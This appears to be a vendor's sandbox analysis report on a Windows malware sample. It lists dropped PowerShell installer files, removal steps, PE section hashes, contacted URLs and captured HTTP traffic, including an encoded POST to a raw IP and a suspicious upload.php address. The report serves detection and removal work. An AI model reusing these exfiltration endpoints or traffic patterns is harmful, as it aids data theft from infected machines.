    C:\ea6d03fb84304f0031a48a\about_execution_policies.help.txt (13 bytes)
    C:\ea6d03fb84304f0031a48a\bitstransfer.psd1 (950 bytes)
    C:\ea6d03fb84304f0031a48a\powershell_ise.resources.dll (4 bytes)
    C:\ea6d03fb84304f0031a48a\about_job_details.help.txt (824 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.graphicalhost.dll (4408 bytes)
    C:\ea6d03fb84304f0031a48a\windowsremotemanagement.adm (574 bytes)
    C:\ea6d03fb84304f0031a48a\about_pssnapins.help.txt (6 bytes)
    C:\ea6d03fb84304f0031a48a\about_reserved_words.help.txt (1 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.editor.dll (14450 bytes)
    C:\ea6d03fb84304f0031a48a\powershell.exe.mui (10 bytes)
    C:\ea6d03fb84304f0031a48a\about_data_sections.help.txt (5 bytes)
    C:\ea6d03fb84304f0031a48a\about_bits_cmdlets.help.txt (7 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
    C:\ea6d03fb84304f0031a48a\wevtfwd.dll (3351 bytes)
    C:\ea6d03fb84304f0031a48a\about_escape_characters.help.txt (2 bytes)
    C:\ea6d03fb84304f0031a48a\about_functions.help.txt (586 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
    C:\ea6d03fb84304f0031a48a\types.ps1xml (2510 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.resources.dll (778 bytes)
    C:\ea6d03fb84304f0031a48a\pspluginwkr.dll (1756 bytes)
    C:\ea6d03fb84304f0031a48a\about_ref.help.txt (1 bytes)
    C:\ea6d03fb84304f0031a48a\registry.format.ps1xml (20 bytes)
    C:\ea6d03fb84304f0031a48a\filesystem.format.ps1xml (133 bytes)
    C:\ea6d03fb84304f0031a48a\about_windows_powershell_2.0.help.txt (453 bytes)
    C:\ea6d03fb84304f0031a48a\diagnostics.format.ps1xml (590 bytes)
    C:\ea6d03fb84304f0031a48a\wtrinstaller.ico (4803 bytes)
    C:\ea6d03fb84304f0031a48a\about_scopes.help.txt (76 bytes)
    C:\ea6d03fb84304f0031a48a\certificate.format.ps1xml (155 bytes)
    C:\ea6d03fb84304f0031a48a\about_remote_requirements.help.txt (6 bytes)
    C:\ea6d03fb84304f0031a48a\about_comparison_operators.help.txt (11 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.gpowershell.resources.dll (408 bytes)
    C:\ea6d03fb84304f0031a48a\about_pipelines.help.txt (411 bytes)
    C:\ea6d03fb84304f0031a48a\wsmanhttpconfig.exe (3009 bytes)
    C:\ea6d03fb84304f0031a48a\about_aliases.help.txt (6 bytes)
    C:\ea6d03fb84304f0031a48a\about_switch.help.txt (489 bytes)
    C:\ea6d03fb84304f0031a48a\about_arrays.help.txt (8 bytes)
    C:\ea6d03fb84304f0031a48a\about_wmi_cmdlets.help.txt (8 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.dll-help.xml (1797 bytes)
    C:\ea6d03fb84304f0031a48a\about_remote.help.txt (7 bytes)
    C:\ea6d03fb84304f0031a48a\powershell_ise.exe (2526 bytes)
    C:\ea6d03fb84304f0031a48a\windowsremoteshell.adm (12 bytes)
    C:\ea6d03fb84304f0031a48a\$shtdwn$.req (788 bytes)
    C:\ea6d03fb84304f0031a48a\about_debuggers.help.txt (21 bytes)
    C:\ea6d03fb84304f0031a48a\wsmplpxy.dll (603 bytes)
    C:\ea6d03fb84304f0031a48a\winrshost.exe (22 bytes)
    C:\ea6d03fb84304f0031a48a\about_remote_troubleshooting.help.txt (146 bytes)
    C:\ea6d03fb84304f0031a48a\profile.ps1 (772 bytes)
    C:\ea6d03fb84304f0031a48a\pscustomsetuputil.exe (316 bytes)
    C:\ea6d03fb84304f0031a48a\wsman.format.ps1xml (837 bytes)
    C:\ea6d03fb84304f0031a48a\about_script_blocks.help.txt (3 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1184 bytes)
    %System%\SETBF.tmp (42 bytes)
    %WinDir%\ocmsn.log (7791 bytes)
    %System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
    %System%\SET12.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
    %System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
    %System%\SETC.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
    %System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
    %System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
    %System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
    %System%\SET2D.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
    %System%\SET25.tmp (1281 bytes)
    %System%\SET13.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
    %System%\SET20.tmp (2 bytes)
    %System%\SET14.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
    %System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
    %WinDir%\inf\SET32.tmp (38 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
    %System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
    %System%\SET2A.tmp (2 bytes)
    %WinDir%\inf\oem10.PNF (10040 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
    %System%\SET7.tmp (35 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
    %System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
    %WinDir%\msmqinst.log (5482 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
    %System%\SET22.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
    %System%\spmsg.dll (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
    %System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
    %System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
    %System%\SET2B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
    %WinDir%\inf\SET18.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
    %System%\SETE.tmp (22 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
    %System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
    %System%\SET6.tmp (2 bytes)
    %System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
    %System%\wbem\SET4.tmp (4 bytes)
    %System%\SET17.tmp (673 bytes)
    %WinDir%\tabletoc.log (2313 bytes)
    %System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
    %System%\SETA.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
    %System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
    %WinDir%\MedCtrOC.log (8910 bytes)
    %System%\config\SYSTEM.LOG (5401 bytes)
    %System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
    %System%\SET27.tmp (601 bytes)
    %System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
    %System%\SET11.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
    %WinDir%\Help\SETC5.tmp (12287 bytes)
    %System%\SET8.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
    %WinDir%\msgsocm.log (6541 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
    %System%\SETF.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
    %System%\SET10.tmp (2 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
    %System%\SET26.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
    %System%\SET21.tmp (35 bytes)
    %System%\config\system (3267 bytes)
    %System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
    %System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
    %WinDir%\SECD0.tmp (1897 bytes)
    %System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
    %WinDir%\imsins.log (3792 bytes)
    %System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
    %System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
    %System%\SET16.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
    %System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
    %System%\CatRoot2\dberr.txt (1031 bytes)
    %System%\SETB.tmp (1281 bytes)
    %System%\SET1F.tmp (1 bytes)
    %WinDir%\iis6.log (139812 bytes)
    %WinDir%\comsetup.log (48646 bytes)
    %System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
    %System%\spupdsvc.exe (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
    %System%\SET28.tmp (22 bytes)
    %System%\SET5.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
    %System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
    %System%\SET31.tmp (673 bytes)
    %System%\SET2E.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
    %System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
    %System%\SET29.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
    %System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
    %System%\SET2C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
    %WinDir%\KB968930.log (242903 bytes)
    %System%\SET15.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
    %WinDir%\ntdtcsetup.log (22997 bytes)
    %System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
    %WinDir%\inf\oem10.inf (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
    %System%\SET24.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
    %System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
    %System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
    %WinDir%\FaxSetup.log (53338 bytes)
    %WinDir%\tsoc.log (79170 bytes)
    %System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
    %WinDir%\KB968930xp.cat (59 bytes)
    %System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
    %System%\winrm\0409\SET1D.tmp (601 bytes)
    %System%\SETD.tmp (601 bytes)
    %WinDir%\inf\SET19.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
    %System%\SET9.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
    %System%\winrm\0409\SET37.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
    %System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
    %WinDir%\ocgen.log (71000 bytes)
    %System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
    %System%\SET2F.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
    %System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
    %System%\SET30.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
    %System%\wbem\SET1E.tmp (4 bytes)
    %System%\SET23.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
    %WinDir%\netfxocm.log (9089 bytes)
    %System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
    %WinDir%\inf\SET33.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
    %WinDir%\assembly\tmp\J147ADHK\System.Management.Automation.dll (81046 bytes)
    %WinDir%\assembly\tmp\M47ADGJM\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
    %WinDir%\assembly\tmp\G037ADGK\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
    %WinDir%\assembly\tmp\CUX147AD\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
    %WinDir%\assembly\tmp\N58BEHKN\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
    %WinDir%\assembly\tmp\S9DGJMPS\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\1KNQTWZ2\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
    %WinDir%\assembly\tmp\Q8BEHKNR\Microsoft.WSMan.Management.resources.dll (13 bytes)
    %WinDir%\assembly\tmp\J258BEHK\Microsoft.PowerShell.Security.dll (2392 bytes)
    %WinDir%\assembly\tmp\FX0369DG\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\CUX036AD\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
    %WinDir%\assembly\tmp\5NQUX036\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
    %WinDir%\assembly\tmp\1LOSVY15\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
    %WinDir%\assembly\tmp\HZ258BEI\Microsoft.WSMan.Management.dll (9608 bytes)
    %WinDir%\assembly\tmp\ZHKNQTX0\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
    %WinDir%\assembly\tmp\8QTWZ258\System.Management.Automation.resources.dll (9320 bytes)
    %WinDir%\assembly\tmp\FZ258CFI\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
    %WinDir%\assembly\tmp\P9CFILPS\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\YGJMQTWZ\Microsoft.PowerShell.Security.resources.dll (9 bytes)
    %WinDir%\assembly\tmp\SADGJNQT\Microsoft.WSMan.Runtime.dll (7 bytes)
    %WinDir%\assembly\tmp\L369CFIL\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
    %WinDir%\assembly\tmp\WEHKNQTW\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\3MPSVZ25\Microsoft.PowerShell.Editor.dll (32824 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\System.Management.Automation.dll (105990 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (83393 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text40961713291715204.46072169e0ec9c8715074e47f35bbb53b54fc
.rdata17612864274645124.00146f084d038b87830ef124c9ff9a24f7f79
.data2416641630881923.643945238aa112cca1d1989d6346f8c233774
.ndata2580482011672012165.543931dfbf0118c6d8708a97a1eacc128cdea
.rsrc46284894524947204.29356158f870d535a930f56ef135a9ca3eb4e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:


Total found: 2
0fb144ae2c062287b8b800598a35f8f0
215143874c39fb2025bcffff966b6056

Network Activity

URLs

URL IP
hxxp://microsoft.com/134.170.185.46
hxxp://e10088.dspb.akamaiedge.net/
hxxp://e10088.dspb.akamaiedge.net/uk-ua/
hxxp://a767.dscms.akamai.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
hxxp://b14-mini.ru/upload.php
hxxp://61.3.49.73/
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe188.43.73.10
hxxp://www.microsoft.com/23.223.41.68
hxxp://www.microsoft.com/uk-ua/23.223.41.68

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET / HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: microsoft.com

Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently

Content-Type: text/html; charset=UTF-8

Location: hXXp://VVV.microsoft.com/

Server: Microsoft-IIS/8.5

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

X-Powered-By: ASP.NET

X-UA-Compatible: IE=EmulateIE7

Date: Thu, 16 Jul 2015 02:18:40 GMT

Connection: close

Content-Length: 148

<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>..

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 61.3.49.73

Content-Length: 352

Cache-Control: no-cache

dGtGgMVsUyyOMFnmPGUggMxGkq3uegesPHrOmB3x2hJyReKthoxND9/EeNQRDhnvRfQv23yOEVhB4h/0uIy4kB/LjhzU6Sh4AWccRKVb/dqHb1c TIbn9I6KP3TTnaXNtWGTxNIYyHPDPPvuObDYAIJ7dM89gd7H4je3nZcUi1DWtKmBxPWNV eGI2Its9DE1oQDbHdbOyCMnphUfFxf10onTCC9GDvxiRThJ6je7Q8Z7LxWnDWuCtmcX9pLErdcTpH89J2Cueu3AtmMaOm5M8ct/DUxOb0N/Wa7VP3JDWqopHKj3j1CrKP2GQvsEqGWidF/TwvYxCnsMG/ZM9m8m1ZbKpFLdw==

HTTP/1.1 401 Unauthorized

WWW-Authenticate: Basic realm="DSL-2520U_Z2"

Content-Type: text/html

Transfer-Encoding: chunked

Server: RomPager/4.07 UPnP/1.0

EXT:

HTTP/1.1 401 Unauthorized..WWW-Authenticate: Basic realm="DSL-2520U_Z2"..Content-Type: text/html..Transfer-Encoding: chunked..Server: RomPager/4.07 UPnP/1.0..EXT:..083..<html>.<head>.<title>Protected Object</title></head><body>.<h1>Protected Object</h1>This object on the RomPager server is protected..0..083..<html>.<head>.<title>Protected Object</title></head><body>.<h1>Protected Object</h1>This object on the RomPager server is protected..0..

GET / HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Cache-Control: no-cache

Host: VVV.microsoft.com

HTTP/1.1 302 Moved Temporarily

Server: AkamaiGHost

Content-Length: 0

Location: hXXp://VVV.microsoft.com/uk-ua/

Date: Thu, 16 Jul 2015 02:18:41 GMT

Connection: keep-alive

X-CCC: SE

X-CID: 2

....

GET /uk-ua/ HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Cache-Control: no-cache

Host: VVV.microsoft.com

HTTP/1.1 200 OK

Cache-Control: no-cache, no-store

Pragma: no-cache

Content-Type: text/html

Expires: -1

Server: Microsoft-IIS/8.0

CorrelationVector: tfQUF9cAt0GGFYxz.1.1

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Access-Control-Allow-Headers: Content-Type

Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS

Access-Control-Allow-Credentials: true

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

Content-Length: 233992

Date: Thu, 16 Jul 2015 02:18:42 GMT

Connection: keep-alive

Set-Cookie: MS-CV=tfQUF9cAt0GGFYxz.1; domain=.microsoft.com; expires=Fri, 17-Jul-2015 02:18:41 GMT; path=/

X-CCC: SE

X-CID: 2

...<!DOCTYPE html ><html xmlns:mscom="hXXp://schemas.microsoft.com/CMSvNext" xmlns:md="hXXp://schemas.microsoft.com/mscom-data" lang="uk" xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="//VVV.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="hXXp://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js"> .. // Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - hXXp://VVV.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" 